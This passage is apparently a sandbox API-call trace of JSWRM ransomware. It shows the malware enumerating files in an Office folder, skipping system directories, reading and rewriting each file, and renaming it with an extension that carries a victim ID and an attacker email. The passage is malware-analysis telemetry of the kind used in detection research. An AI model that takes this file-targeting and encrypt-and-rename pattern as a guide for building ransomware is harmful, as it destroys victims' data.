lpString2="$RECYCLE.BIN") returned 1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="system volume information") returned -1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="msocache") returned -1 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEACT.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEACT.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LINEACT.POC", lpUsedDefaultChar=0x0) returned 11 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEACT.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEACT.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LINEACT.POC", lpUsedDefaultChar=0x0) returned 11 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LINEACT.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lineact.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.102] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2820) returned 1 [0142.102] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.102] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb00, lpOverlapped=0x0) returned 1 [0142.103] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.103] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb00, lpOverlapped=0x0) returned 1 [0142.104] CloseHandle (hObject=0x238) returned 1 [0142.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LINEACT.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lineact.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LINEACT.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lineact.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.105] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22ca7e1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22ca7e1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2303b5cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb026, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LOGO98.POC", cAlternateFileName="")) returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2=".") returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="..") returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="...") returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="windows") returned -1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="recovery") returned -1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="perflogs") returned -1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="documents and settings") returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="system volume information") returned -1 [0142.105] lstrcmpiW (lpString1="LOGO98.POC", lpString2="msocache") returned -1 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOGO98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOGO98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGO98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOGO98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOGO98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGO98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LOGO98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\logo98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.106] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45094) returned 1 [0142.106] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.106] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb020, lpOverlapped=0x0) returned 1 [0142.110] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.111] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb020, lpOverlapped=0x0) returned 1 [0142.111] CloseHandle (hObject=0x238) returned 1 [0142.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LOGO98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\logo98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LOGO98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\logo98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.112] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233a8be5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233a8be5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233a8be5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa82a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LTHD11.POC", cAlternateFileName="")) returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2=".") returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="..") returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="...") returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="windows") returned -1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="recovery") returned -1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="perflogs") returned -1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="documents and settings") returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="system volume information") returned -1 [0142.112] lstrcmpiW (lpString1="LTHD11.POC", lpString2="msocache") returned -1 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD11.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD11.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD11.POC", lpUsedDefaultChar=0x0) returned 10 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD11.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD11.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD11.POC", lpUsedDefaultChar=0x0) returned 10 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.113] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43050) returned 1 [0142.113] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.113] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xa820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xa820, lpOverlapped=0x0) returned 1 [0142.123] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.123] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xa820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xa820, lpOverlapped=0x0) returned 1 [0142.123] CloseHandle (hObject=0x238) returned 1 [0142.123] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.125] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x230153e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x230153e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2303b5cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2383c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LTHD98.POC", cAlternateFileName="")) returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2=".") returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="..") returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="...") returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="windows") returned -1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="recovery") returned -1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="perflogs") returned -1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="documents and settings") returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="system volume information") returned -1 [0142.125] lstrcmpiW (lpString1="LTHD98.POC", lpString2="msocache") returned -1 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.126] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=145468) returned 1 [0142.126] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.126] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x23830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x23830, lpOverlapped=0x0) returned 1 [0142.136] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.136] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x23830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x23830, lpOverlapped=0x0) returned 1 [0142.136] CloseHandle (hObject=0x238) returned 1 [0142.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.138] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x230153e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x230153e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LTHD98SP.POC", cAlternateFileName="")) returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2=".") returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="..") returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="...") returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="windows") returned -1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="recovery") returned -1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="perflogs") returned -1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="documents and settings") returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="system volume information") returned -1 [0142.138] lstrcmpiW (lpString1="LTHD98SP.POC", lpString2="msocache") returned -1 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98SP.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHD98SP.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHD98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.139] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15872) returned 1 [0142.139] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.139] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3e00, lpOverlapped=0x0) returned 1 [0142.141] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.141] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3e00, lpOverlapped=0x0) returned 1 [0142.142] CloseHandle (hObject=0x238) returned 1 [0142.142] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHD98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthd98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.145] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x230ade29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x230ade29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a9a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LTHDHM.POC", cAlternateFileName="")) returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2=".") returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="..") returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="...") returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="windows") returned -1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="recovery") returned -1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="perflogs") returned -1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="documents and settings") returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="system volume information") returned -1 [0142.145] lstrcmpiW (lpString1="LTHDHM.POC", lpString2="msocache") returned -1 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHDHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHDHM.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHDHM.POC", lpUsedDefaultChar=0x0) returned 10 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHDHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LTHDHM.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LTHDHM.POC", lpUsedDefaultChar=0x0) returned 10 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHDHM.POC" (normalized: "c:\\program files\\microsoft 